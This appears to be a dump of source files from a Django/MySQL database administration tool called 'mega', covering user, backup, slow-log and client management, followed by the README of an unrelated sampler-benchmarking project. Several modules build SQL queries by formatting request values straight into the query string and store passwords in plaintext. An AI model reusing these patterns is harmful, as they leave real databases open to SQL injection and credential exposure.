def __init__(self,user_info):\n self.user=Users\n self.user_id=user_info.get(\"user_id\")\n self.user_name=user_info.get(\"name\")\n self.user_sign=user_info.get(\"sign\")\n self.user_role=user_info.get(\"role\")\n self.user_pid=user_info.get(\"pid\")\n self.user_pwd=user_info.get(\"pwd\")\n self.user_phone=user_info.get(\"phone\")\n self.msg=''\n def user_add(self):\n if not self.data_check():\n return False,self.msg\n _user=Users(name=self.user_name,role=self.user_role,sign=self.user_sign,p_id=self.user_pid,pwd=self.user_pwd,phone=self.user_phone,stat=STAT_ONLINE)\n _user.save()\n self.msg='success'\n return True,self.msg\n def user_mod(self):\n if not self.data_check():\n return False,self.msg\n _user=self.user.objects.get(id=self.user_id)\n _user.name=self.user_name\n _user.role=self.user_role\n _user.sign=self.user_sign\n _user.p_id=self.user_pid\n _user.pwd=self.user_pwd\n _user.phone=self.user_phone\n _user.save()\n self.msg='success'\n return True,self.msg\n def user_stat(self):\n if not self.user_id:\n return False,self.msg\n _user=self.user.objects.get(id=self.user_id)\n if _user.stat == 1:\n _user.stat=0\n else:\n _user.stat=1\n _user.save()\n return True,self.msg\n def data_check(self):\n if not self.user_name:\n self.msg=MSG_ERR_NAME\n return False\n if not self.user_role:\n self.user_role=1\n if not self.user_sign:\n self.user_sign=''\n if not self.user_pid:\n self.user_pid=1\n if not self.user_pwd:\n self.user_pwd=DEFAULT_PWD\n if not self.user_phone:\n self.user_phone=0\n return True\nclass UserGet():\n def __init__(self):\n self.user=Users\n def get_user_list(self,str_filter,count=10,offset=0):\n result=None\n \n if not str_filter:\n str_filter=''\n if len(str_filter) ==0:\n if count==0:\n result=self.user.objects.all().order_by('-stat').values()\n else:\n result=self.user.objects.all().order_by('-stat')[offset:count].values()\n else:\n value=str_filter['name'] \n if len(value) <> 0:\n result=self.user.objects.filter(name=value)[offset:count].values()\n else:\n result=self.user.objects.all().order_by('-stat').values()\n\n return result\n def get_user_by_id(self,user_id):\n if not user_id:\n return False\n result=self.user.objects.filter(id=user_id).values()\n if len(result)>0:\n return result[0]\n return False" }, { "alpha_fraction": 0.5332680940628052, "alphanum_fraction": 0.6193737983703613, "avg_line_length": 20.76595687866211, "blob_id": "3db2822e9a2bb2711e9bc81511afb4446f15967d", "content_id": "c6ac2f4207940b19160fe3a3423715917e0bb59c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1022, "license_type": "no_license", "max_line_length": 48, "num_lines": 47, "path": "/src/tests/update_backupinfo.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append(\"..\")\nfrom mega_service.sender import MegaClient\n\nvar='''task_info={ \"backup_tool\": \"xtrabackup\", \n\"backup_type\": \"full\",\n\"db_type\":\"mysql\",\n\"backup_level\":\"instance\",\n\"level_value\":\"\",\n\"need_data\":\"Y\",\n\"need_schema\":\"Y\",\n\"rsync\":\"Y\",\n\"message\": \"xtrabackup is running now!\", \n\"host_ip\": \"172.17.62.37\", \n\"id\": 1, \n\"isEncrypted\": \"Y\", \n\"iscompress\": \"Y\", \n\"port\": 3309, \n\"retention\": \"7\", \n\"status\": 1},action='insert'\n'''\nvar_update='''task_info={\"id\":82,\n\"status\": 'Y',\n\"is_delete\":'Y',\n\"backup_begin_time\":'2013:01:01 02:02:02',\n\"backup_end_time\":'2013:01:01 02:02:02',\n\"rsync_begin_time\":'2013:01:01 
02:02:02',\n\"rsync_end_time\":'2013:01:01 02:02:02',\n'file_size':'2013:01:01 02:02:02',\n'message':'test update'},action='update'\n'''\n\ndef test_insert():\n cmd='update_backupinfo'\n c=MegaClient(cmd=cmd)\n print c.run(var)\ndef test_update():\n cmd='update_backupinfo'\n c=MegaClient(cmd=cmd)\n print c.run(var_update)\n\n\n\n\nif __name__==\"__main__\":\n test_insert()\n test_update()" }, { "alpha_fraction": 0.6422535181045532, "alphanum_fraction": 0.6464788913726807, "avg_line_length": 30.921348571777344, "blob_id": "d4dabe994cebe5ea18d0a76787b819fcde9ac4b2", "content_id": "4278d1f6a9e6887b83bc00cb96630679f610ca6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2840, "license_type": "no_license", "max_line_length": 118, "num_lines": 89, "path": "/src/mega_web/urls.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from views import * \nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf.urls import patterns, include, url\n\n\n#admin\nadmin.autodiscover()\n\n#for error catch\nhandler404 = my_404_view\nhandler500 = my_500_view\n\n\nurlpatterns = patterns('',\n url(r'^$',home),\n url(r'^portal/$',portal),\n url(r'^tunning/$',tunning),\n url(r'^console/$',console),\n url(r'^mega-admin/$',mega_admin),\n url(r'^login/$',login),\n url(r'^accounts/login/$',login),\n url(r'^logout/$',logout),\n #django\n url(r'^admin/', include(admin.site.urls)),\n #sub url\n url(r'^resource/instance/$',instance),\n url(r'^resource/instance_add/$',instance_add),\n url(r'^resource/instance_detail/$',instance_detail),\n \n url(r'^resource/server/$',server),\n url(r'^resource/server_add/$',server_add),\n url(r'^resource/server_detail/$',server_detail),\n\n url(r'^resource/business/$',business),\n url(r'^resource/business_add/$',business_add),\n url(r'^resource/business_detail/$',business_detail),\n\n url(r'^resource/database/$',database),\n url(r'^resource/database_add/$',database_add),\n url(r'^resource/database_detail/$',database_detail),\n \n url(r'^resource/user/$',user),\n url(r'^resource/user_add/$',user_add),\n url(r'^resource/user_detail/$',user_detail),\n \n url(r'^resource/vip/$',vip),\n \n \n url(r'^console/backup/$',backup),\n url(r'^console/backup/backup_config/$',backup_config),\n url(r'^console/backup/backup_config_list/$',backup_config_list),\n\n url(r'^console/task/$',task),\n url(r'^console/task/task_add/$',task_add),\n url(r'^console/task/task_detail/$',task_detail),\n\n\n url(r'^tunning/slowlog/config/$',slowlog_config),\n url(r'^tunning/slowlog/report/$',slowlog_report),\n url(r'^tunning/slowlog/report/sql/$',slowlog_sql),\n url(r'^tunning/slowlog/report/instance/$',slowlog_instance),\n\n url(r'^console/failover/$',failover),\n url(r'^console/failover/switch/$',switch),\n url(r'^console/failover/switch/detail/$',switch_detail),\n \n url(r'^monitor/$',monitor),\n url(r'^monitor/baseinfo/$',baseinfo),\n url(r'^monitor/baseinfo/instance/$',baseinfo_instance),\n #url(r'^monitor/baseinfo/server/$',baseinfo_server),\n #url(r'^monitor/baseinfo/database/$',baseinfo_database),\n #url(r'^monitor/baseinfo/table/$',baseinfo_table),\n\n url(r'^monitor/status/$',status),\n url(r'^monitor/report/$',report),\n\n\n url(r'^portal/document/$',document),\n \n url(r'^mega-admin/client/$',client),\n \n #for static like css ,js ,ima,music \n url(r'^static/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.STATIC_URLS },name=\"static\"),\n\n 
#other\n url(r'^fun/$',fun), \n)+static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)" }, { "alpha_fraction": 0.575875461101532, "alphanum_fraction": 0.5859922170639038, "avg_line_length": 28.9069766998291, "blob_id": "56547c0beba296504ee1407e94b402ebbd3baede", "content_id": "f8d0b13b2a9397b03866e9acf96b3f13646f1926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1285, "license_type": "no_license", "max_line_length": 80, "num_lines": 43, "path": "/src/mega_web/admin/client_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 7, 2014\n\n@author: xchliu\n\n@module:mega_web.admin.client_manage\n'''\nimport datetime\nfrom mega_web.entity.models import Client,Server\n\nclass ClientGet():\n '''\n '''\n def __init__(self):\n self.client=Client\n self.server=Server\n self.LIFECYCLE=300\n \n def get_client_list(self):\n client_list=self.client.objects.all().values().order_by(\"-heartbeat\")\n for client in client_list:\n _server=self.server.objects.filter(id=client['server_id'])\n if _server:\n client['ip']=_server.values('ip')[0]['ip']\n _heartbeat=(datetime.datetime.now()-client['heartbeat']).seconds\n if _heartbeat > self.LIFECYCLE:\n client['stat']=0\n else:\n client['stat']=1\n return client_list\n def get_client_statics(self):\n count={}\n _time=datetime.datetime.now()-datetime.timedelta(seconds=self.LIFECYCLE)\n count['server']=Server.objects.filter(stat__gt=0).count()\n count['online']=Client.objects.filter(heartbeat__gt=_time).count()\n count['offline']=Client.objects.filter(heartbeat__lt=_time).count()\n return count\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6996337175369263, "alphanum_fraction": 0.7289377450942993, "avg_line_length": 33.125, "blob_id": "c2959351553812fe3a8e28b0293f5266ac13ba3f", "content_id": "f2bb5a6225509d7e70be23a62ee75fb8cf16eea2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 273, "license_type": "no_license", "max_line_length": 82, "num_lines": 8, "path": "/src/scripts/init_db.sql", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#\n\nuse mega;\n\ninsert into user(name,stat) values('DBA',1);\ninsert into business(name,owner)values('None',1);\ninsert into task (name,type,value,cycle) values('backup',0,'backup_routine',60);\ninsert into task (name,type,value,cycle) values('slowlog',0,'slowlog_routine',60);\n" }, { "alpha_fraction": 0.5277582406997681, "alphanum_fraction": 0.540173351764679, "avg_line_length": 43.0206184387207, "blob_id": "1843559cfb563a0c8d991fcc75fb8cc84d1d365a", "content_id": "56c1cb9f6b404cea81f22befcd005720c8a20fe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 208, "num_lines": 97, "path": "/src/mega_service/slowlog/slowlog_archive.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 20, 2014\n\n@author: xchliu\n\n@module:mega_service.slowlog.slowlog_archive\n'''\nimport time\nfrom hashlib import md5\nfrom lib.sql_parse import SQLParse\nfrom lib.PyMysql import PyMySQL\nfrom lib.utils import today\nfrom lib.logs import Logger\n\n\nMODEL='slowlog_statics'\nlog = Logger(MODEL).log()\n#from mega_web.resource.instance_manage import InstanceGet\n\ndef slowlog_statics_per_hour(v_time):\n '''\n 1.slowlog_archive_hour \n 
2.slowlog_time_day\n '''\n #get the \n _hour=v_time.split(':')[0]\n _pre_hour=int(_hour)-1\n _time=\"%s %s:00:00\" % (today(),_hour)\n _pre_time=\"%s %s:00:00\" % (today(),_pre_hour)\n _pre_time=int(time.mktime(time.strptime(_pre_time,'%Y-%m-%d %H:%M:%S')))\n _time=int(time.mktime(time.strptime(_time,'%Y-%m-%d %H:%M:%S')))\n sql_1='''insert into slowlog_sql_hour(hash_code,log_time,counts,max_time,avg_time,min_time,max_row,avg_row,min_row)\n select hash_code,from_unixtime(start_time),count(*),max(query_time),avg(query_time),min(query_time),max(rows_examined),avg(rows_examined),min(rows_examined) \n from slowlog_info where start_time between '%s' and '%s' group by hash_code;''' %(_pre_time,_time)\n #log.debug(sql_1)\n result,ex=PyMySQL().execute(sql_1)\n if not result :\n log.error(ex)\n \n #\n sql_2=\"select instance_id,dbname,start_time,count(*) as counts from slowlog_info where start_time between '%s' and '%s' group by instance_id,dbname;\" \\\n % (_pre_time,_time)\n #log.debug(sql_2)\n cursor=PyMySQL().query(sql_2, type='dict')\n data_list=cursor.fetchall()\n if data_list and len(data_list) >0 :\n _list=(1,5,10,100)\n for data in data_list:\n c=''\n _pre_c=0 \n _counts=[]\n for l in _list:\n _c=0\n _sql=\"select count(*) from slowlog_info where instance_id=%s and dbname='%s' and start_time between '%s' and '%s' and query_time between %s and %s;\" \\\n %(data.get('instance_id'),data.get('dbname'),_pre_time,_time,_pre_c,l)\n _c=PyMySQL().fetchOne(_sql)\n _counts.append(int(_c))\n _pre_c=l\n _counts.append(int(data.get('counts')-sum(_counts)))\n #make sure all the values bigger than zero\n _counts=map(lambda x :abs(x),_counts)\n data['count_all']=_counts\n sql_3=\"select id from slowlog_time_day where instance_id=%s and db='%s' and date(log_time)='%s'\" %(data.get('instance_id'),data.get('dbname'),today())\n #log.debug(sql_3)\n row_id=PyMySQL().fetchOne(sql_3)\n c=data.get('count_all')\n if not row_id or row_id == 0:\n _sql=\"insert into slowlog_time_day(instance_id,db,log_time,counts,lt_one,lt_five,lt_ten,lt_hundred,gt_hundred) values(%s,'%s',from_unixtime(%s),%s,%s,%s,%s,%s,%s)\" % (data.get('instance_id'), \n data.get('dbname'),data.get('start_time'),\n data.get('counts'),c[0],c[1],c[2],c[3],c[4])\n else:\n _sql=\"update slowlog_time_day set counts=counts+%s,lt_one=lt_one+%s,lt_five=lt_five+%s,lt_ten=lt_ten+%s,lt_hundred=lt_hundred+%s,gt_hundred=gt_hundred+%s \\\n where id=%s\" %(data.get('counts'),c[0],c[1],c[2],c[3],c[4],row_id) \n # log.debug(_sql)\n result,ex=PyMySQL().execute(_sql)\n if not result :\n log.error(ex)\n return True\n \ndef slowlog_pack(sql):\n try:\n sql_parsed=SQLParse(sql).var_replace()\n except:\n sql_parsed=sql \n sql_hash=md5(sql_parsed.encode('utf8')).hexdigest()\n _sql=\"select count(*) from sql_format where hash_code='%s'\" % sql_hash\n _counts=PyMySQL().fetchOne(_sql)\n if _counts == 0:\n _sql=\"insert into sql_format(hash_code,sql_parsed) values('%s','%s')\" %(sql_hash,sql_parsed)\n PyMySQL().execute(_sql)\n return sql_hash\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5819398164749146, "alphanum_fraction": 0.5969899892807007, "avg_line_length": 22.959999084472656, "blob_id": "2002c8eeb3975797ef6ebcf26e69e26984d2917c", "content_id": "3373ccaf5d1cfaa13bf3829ea3e6bdccaa5b92f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "no_license", "max_line_length": 101, "num_lines": 25, "path": "/src/mega_client/setup.py", "repo_name": 
"Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 21, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.setup\n'''\n\nfrom distutils.core import setup\n\nVERSION='1.0'\n\nsetup(name='mega',\n version=VERSION,\n description='Mega client',\n author='XCHLIU',\n author_email='[email protected]',\n py_modules=['mega_client.sender','mega_client.utils','mega_client.logs','mega_client.setting'],\n #url='',\n #packages=['mega_client','mega_client/script'],\n #package_dir={'mypkg': 'src/mypkg'},\n # package_data={'mypkg': ['data/*.dat']},\n #data_files=[('',['install.sh'])]\n )" }, { "alpha_fraction": 0.6915887594223022, "alphanum_fraction": 0.722741425037384, "avg_line_length": 19.03125, "blob_id": "8b82fa0f5d81b5bfa2ecd1dcc347e1c90e061402", "content_id": "76adf0b075fec8a81325c3378eddf3ceb493def7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 642, "license_type": "no_license", "max_line_length": 60, "num_lines": 32, "path": "/src/mega_client/mega-1.0/mega_client/setting.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.setting\n\n'''\n#meta data\nversion='mega-client 0.1'\nTCP_HOST='' # default 0.0.0.0\nTCP_PORT=1105\nMEGA_HOST='mega-server.d.chinabank.com.cn'\nMEGA_HOST='localhost'\n\n\nKEEPALIVE=300\n\n#all the script invoked by worker should be in the directory\nSCRIPT_DIR='/home/mysql/admin/mega_client/script/'\n\n#only used for client . \nCLIENT_DIR='/home/mysql/'\n\nDEAFULT_LOG_DEBUG=True\nLOG_FILE_NAME='/var/log/mega/mega_client.log'\nDAEMON_PID='/var/run/mega_client.pid'\nSERVICE_PID='/var/run/mega_client_srv.pid'\nDAEMON_LOG=LOG_FILE_NAME\n\nDEFAULT_TARGET='cmd'\n\n" }, { "alpha_fraction": 0.6156960725784302, "alphanum_fraction": 0.6190179586410522, "avg_line_length": 48.6134033203125, "blob_id": "b5cd53ceeed5cd9e92ba965adc7b252da275c99f", "content_id": "318023eb0c536e109f0838ac189477f22821f553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9633, "license_type": "no_license", "max_line_length": 162, "num_lines": 194, "path": "/src/mega_web/console/backup.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nimport datetime\nfrom lib.utils import today\nfrom lib.PyMysql import PyMySQL\nfrom mega_web.resource.server_manage import ServerGet\nfrom mega_web.resource.instance_manage import InstanceGet\nfrom mega_web.resource.business_manage import BusinessGet\nfrom mega_web.entity.models import Backup_History_Info,Backup_Policy\nfrom conf.GlobalConf import BACKUP_TOOL,BACKUP_TYPE,BACKUP_LEVEL,BACKUP_CYCLE,DEFAULT_DB_PORT,MIN_BACKUP_PERIOD\n\n\n\nclass Backup():\n def __init__(self):\n self.backup_info=Backup_History_Info\n self.backup_policy=Backup_Policy\n self.q=PyMySQL()\n \n def get_newest_backup_list(self,ip=None):\n if (not ip) or (ip == ''):\n sql=\"select * from backup_history_info order by id desc limit 150;\"\n else:\n sql=\"select * from backup_history_info where host_ip='%s' limit 150;\" % ip\n _data=[dict(d.__dict__) for d in self.backup_info.objects.raw(sql)]\n for _d in _data:\n ip=_d['host_ip']\n port=_d['port']\n instance_id=InstanceGet().get_instance_by_ip_port(ip, port)\n if not instance_id:\n continue\n instance_id=instance_id[0]['id']\n _d['instance_id']=instance_id\n inst=InstanceGet().get_instance_by_id(instance_id)\n 
_d['instance_name']=inst['name']\n _d['business_name']=BusinessGet().get_business_by_id(inst['business_id'])['name']\n _d['server_name']=ServerGet().get_server_by_id(inst['server_id'])['name']\n return _data\n \n def get_config_by_instance(self,ip='',port=3306):\n if not ip:\n return None,''\n if not port:\n port=3306\n instance_id=InstanceGet().get_instance_by_ip_port(ip, port)\n if not instance_id:\n instance_id=None\n return None,\"Instance does not exist!\"\n else:\n sql=\"select * from backup_policy where host_ip='%s' and port=%s;\" % (ip ,port)\n return self.backup_info.objects.raw(sql),''\n def get_config_list(self,ip=None):\n if not ip :\n sql=\"select * from backup_policy order by is_schedule desc;\"\n else:\n sql=\"select * from backup_policy where host_ip='%s';\" % ip\n return self.backup_policy.objects.raw(sql)\n def get_today_statics(self,date=None): \n if not date:\n date=today() \n #planed counts\n _now={}\n _now[\"week\"]=time.strftime('%a',time.strptime(date,'%Y-%m-%d'))\n _now[\"month\"]=time.strftime('%d',time.strptime(date,'%Y-%m-%d')) \n sql=\"select count(*) from backup_policy where cycle='day' and is_schedule=1\"\n count_day=self.q.fetchOne(sql)\n sql=\"select count(*) from backup_policy where cycle='week' and find_in_set('%s',backup_time) and is_schedule=1\" %(_now['week'])\n count_week=self.q.fetchOne(sql)\n sql=\"select count(*) from backup_policy where cycle='month' and find_in_set('%s',backup_time) and is_schedule=1\" %(_now['month'])\n count_month=self.q.fetchOne(sql)\n total_today=count_day+count_week+count_month\n \n #ran backup\n sql=\"select count(*) from backup_history_info where date(backup_begin_time)='%s' and backup_status='Y' \" % date\n success_count=self.q.fetchOne(sql)\n sql=\"select count(*) from backup_history_info where date(backup_begin_time)='%s' and backup_status='N' \" % date\n failure_count=self.q.fetchOne(sql)\n success_ratio=(success_count*100)/total_today\n failure_ratio=(failure_count*100)/total_today\n return {\"total_today\":total_today,\"success_count\":success_count,\"success_ratio\":success_ratio,\"failure_count\":failure_count,\"failure_ratio\":failure_ratio}\n \n def get_uninvoked_backup(self,date=None):\n if not date:\n date=today()\n _now={}\n _now[\"week\"]=time.strftime('%a',time.strptime(date,'%Y-%m-%d'))\n _now[\"month\"]=time.strftime('%d',time.strptime(date,'%Y-%m-%d'))\n sql=\"select a.* from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool and \\\n a.backup_level=b.backup_level and date(b.backup_begin_time)='%s' where a.cycle='day' and a.is_schedule=1 and b.id is null;\" %(date)\n _day=self.q.fetchAll(sql)\n sql=\"select a.*,b.id from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool \\\n and a.backup_level=b.backup_level and date(b.backup_begin_time)='%s' where a.cycle='week' and a.is_schedule=1 and find_in_set('%s',backup_time)\\\n and b.id is null;\" %(date,_now['week'])\n _week=self.q.fetchAll(sql)\n sql=\"select a.*,b.id from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool \\\n and a.backup_level=b.backup_level and date(b.backup_begin_time)='%s' where a.cycle='month' and a.is_schedule=1 and find_in_set('%s',backup_time)\\\n and b.id is null;\" %(date,_now['month'])\n _month=self.q.fetchAll(sql)\n data=[x for x in _day]+[x for x in _week]+[x for x in _month]\n return data\n \n def 
get_failed_backup(self,time=None):\n '''\n return the failed backup info in the given or current hour \n '''\n date=today()\n if not time:\n time=datetime.datetime.now().strftime('%H:%M')\n hour,minite=time.split(':')\n sql=\"select id,host_ip,port,db_type,backup_tool,backup_type,backup_begin_time,file_size,status,message from backup_history_info where \\\n date(backup_begin_time)='%s' and hour(backup_begin_time)=%s and backup_status ='N';\" %(date,hour)\n return self.q.fetchAll(sql)\n \n def get_unavailable_backup(self,time=None):\n '''\n return the list of instance which have no available backup in option days\n '''\n date=today(MIN_BACKUP_PERIOD)\n sql=\"select a.* from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool and \\\n a.backup_level=b.backup_level and date(b.backup_begin_time)>'%s' where a.is_schedule=1 and b.id is null;\" %(date)\n data=self.q.fetchAll(sql)\n return data\n \n \nclass Backup_Config():\n def __init__(self):\n self.backup_tool=BACKUP_TOOL\n self.backup_type=BACKUP_TYPE\n self.backup_level=BACKUP_LEVEL\n self.backup_cycle=BACKUP_CYCLE\n self.backup_policy=Backup_Policy()\n def config_deliver(self,config):\n self.config=config\n type=config.get('type')\n if type == 'add':\n return self.config_add()\n elif type == 'mod':\n return self.config_mod()\n else:\n return False\n def config_add(self):\n self.backup_policy.host_ip=self.config.get(\"ip\")\n if self.config.get(\"port\"):\n self.backup_policy.port=self.config.get(\"port\")\n else:\n self.backup_policy.port=DEFAULT_DB_PORT\n if self.config.get(\"is_scheduled\")=='ON':\n self.backup_policy.is_schedule=1\n else:\n self.backup_policy.is_schedule=0\n db_type=self.config.get(\"db_type\")\n if not db_type:\n self.backup_policy.db_type='mysql'\n else:\n self.backup_policy.db_type=db_type\n self.backup_policy.backup_tool=self.config.get(\"backup_tool\")\n self.backup_policy.backup_type=self.config.get(\"backup_type\")\n self.backup_policy.isencrypted=self.config.get(\"isencrypted\")\n self.backup_policy.cycle=self.config.get('backup_cycle')\n self.backup_policy.schedule_time=self.config.get(\"schedule_time\")\n self.backup_policy.iscompressed=self.config.get(\"iscompressed\")\n self.backup_policy.need_data=self.config.get(\"need_data\")\n self.backup_policy.need_schema=self.config.get(\"need_schema\")\n self.backup_policy.backup_level=self.config.get(\"backup_level\")\n self.backup_policy.level_value=self.config.get(\"level_value\")\n self.backup_policy.backup_time=self.config.get(\"backup_time\")\n self.backup_policy.retention=self.config.get(\"retention\")\n self.backup_policy.save()\n return True\n def config_mod(self):\n config_id=self.config.get(\"id\")\n if config_id:\n backup_policy=Backup_Policy.objects.get(id=config_id)\n else:\n return False\n if self.config.get(\"is_scheduled\")=='ON':\n self.backup_policy.is_schedule=1\n else:\n self.backup_policy.is_schedule=0\n# _time=time.strftime(self.config.get(\"schedule_time\").replace('.',''),\"%I:%M %p\")\n \n backup_policy.backup_tool=self.config.get(\"backup_tool\")\n backup_policy.backup_type=self.config.get(\"backup_type\")\n backup_policy.isencrypted=self.config.get(\"isencrypted\")\n backup_policy.cycle=self.config.get('backup_cycle')\n backup_policy.schedule_time=self.config.get(\"schedule_time\")\n backup_policy.iscompressed=self.config.get(\"iscompressed\")\n backup_policy.need_data=self.config.get(\"need_data\")\n backup_policy.need_schema=self.config.get(\"need_schema\")\n 
backup_policy.backup_level=self.config.get(\"backup_level\")\n backup_policy.level_value=self.config.get(\"level_value\")\n backup_policy.backup_time=self.config.get(\"backup_time\")\n backup_policy.retention=self.config.get(\"retention\")\n backup_policy.save()\n return True\n " } ]
80
diverse-project/BURST
https://github.com/diverse-project/BURST
ab9b0c4b268f096da2c3f0cf943bdd3c28f486ab
8ceeb56500d25432f220eb480da95ff496417eb7
c7e0d46e4cfa63c5365073422bfba73140a6d3ab
refs/heads/master
2023-08-30T00:21:42.132200
2022-06-09T14:39:24
2022-06-09T14:39:24
449,823,806
0
1
null
2022-01-19T19:15:19
2022-01-19T19:33:24
2022-01-19T19:43:57
C
[ { "alpha_fraction": 0.731370747089386, "alphanum_fraction": 0.7610723972320557, "avg_line_length": 68.10909271240234, "blob_id": "a4fad6b3f66b3a94e74766559fe4a244fdc6b5d7", "content_id": "a7f8dcf0c290ea1300b0f099dcf345612980f7dc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7609, "license_type": "permissive", "max_line_length": 633, "num_lines": 110, "path": "/README.md", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "# BURST a benchmarking platform for uniform random sampling techniques\n\nBURST provides Python scripts and Docker environment for evaluating state-of-the-art feature model and SAT samplers (KUS, SPUR, Unigen, etc.) as well as proven statistical test (Barbarik). \nBURST comes with an extensive --- and extensible --- benchmark dataset comprising 500+ SAT formuale and feature models, including challenging, real-world models of the Linux kernel. A demonstration of the tool is available: \n[![Alt\ntext](https://img.youtube.com/vi/sSKosyrfitA/1.jpg)](https://www.youtube.com/watch?v=sSKosyrfitA)\n\n## Usage \n\nYou only need to pull the Docker image `macher/usampling:squashed` that contains both scripts and benchmarks. \n\nTo verify that your installation is correct, please run the following command: \n`docker run macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 barbarikloop.py -flas /home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf --ref-sampler 6 --sampler 2 --seed 1 --timeout 50000; echo END'` \n\nA message with `NOT UNIFORM` should appear at the end. \nThe sampler `QuickSampler` has been used over the formula `/home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf` \n\nIn addition to pull the Docker image, we recommand to clone this repo. Like this, you can benefit from the most recent updates (or simply edit the scripts) by mounting the repo within the Docker image.\nFor instance, you can interactively used the image `docker run -it -v $(pwd):/home/usampling-exp:z macher/usampling:squashed /bin/bash` \nand the scripts are located in `/home/usampling-exp/` \n\n\n### Usage (Sampling)\n\nThe previous example was to check uniformity. \nYou can also generate samples with some samplers.\nFor instance:\n\n`docker run -v $(pwd):/home/usampling-exp:z macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 usampling-experiments.py -flas /home/samplingfm/Benchmarks/Blasted_Real/blasted_case141.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case142.cnf --spur -t 1; echo END'`\n\nis calling SPUR sampler, with a timeout of 1 second, and with formulas explicitly given (here two formulas: useful to focus on specific formulas). 
\nYou can also specify a folder.\nWithout `flas` default formulas contained in the Docker folder/subfolders `/home/samplingfm/` are processed (around 500 files).\n\nTypical outcomes are:\n\n```\ncat usampling-data/experiments-KUS.csv\nformula_file,timeout,execution_time_in,dnnf_time,sampling_time,model_count,counting_time,dnnfparsing_time\n/home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf,False, 0.1399824619293213, 0.011404275894165039, 0.0007951259613037109, 26256, 0.0008006095886230469, 0.0012776851654052734\n```\n\nThe meaning of columns of the CSV file is as follows: `formula_file': the name of the processed model; `timeout': whether a timeout has been reached or not; `execution_time_in' overall execution time; `dnnf_time': the time required by KUS to compile the corresponding DNNF formula; `sampling_time': time taken to produce the samples; `model_count': the number of solutions in the model; `counting\\_time': time taken to count solutions; `dnnfparsing_time': time taken to parse the compiled DNNF formula. All times are reported in seconds.\n\n### Usage (Uniformity)\n\nWe assess uniformity with Barbarik (https://github.com/meelgroup/barbarik). To compute uniformity for a set of models, inside the Docker: `python3 barbarikloop.py -flas gilles --sampler 10 --seed 1 --timeout 60` where sampler is the sampler to be assessed (1=Unigen, 2=QuickSampler, 3=STS, 4=CMS, 5=UniGen3, 6=SPUR, 7=SMARCH, 8=UniGen2,9=KUS, 10=Distance-based Sampling), seed an integer seed and a timeout in seconds. it supports all the parameters of barbarik (use --help to see a description of all the options). We can also specify the sampler used as reference the same way with `--ref-sampler` followed by the sampler to use.\n\nA full usage example is as follows: \n\n`docker run -v $(pwd):/home/usampling-exp:z macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 barbarikloop.py -flas /home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf --sampler 9 --seed 1 --timeout 100; echo END'` \n\nIt's QuickSampler with JHipster feature model and timeout=100 seconds... end eta/epsilon defaut values `cmd: ['python3', 'barbarik.py', '--seed', '1', '--verb', '1', '--eta', '0.9', '--epsilon', '0.3', '--delta', '0.05', '--reverse', '0', '--exp', '1', '--minSamples', '0', '--maxSamples', '9223372036854775807', '--sampler', '9', '--ref-sampler','6', '/home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf']` \n\n## Samplers and data used \n\n```\nSAMPLER_UNIGEN = 1\nSAMPLER_QUICKSAMPLER = 2\nSAMPLER_STS = 3\nSAMPLER_CMS = 4\nSAMPLER_UNIGEN3 = 5\nSAMPLER_SPUR = 6\nSAMPLER_SMARCH = 7\nSAMPLER_UNIGEN2 = 8\nSAMPLER_KUS = 9\nSAMPLER_DISTAWARE = 10\n```\n\nWith BURST, large study and results of different SAT-based samplers are possible:\n * 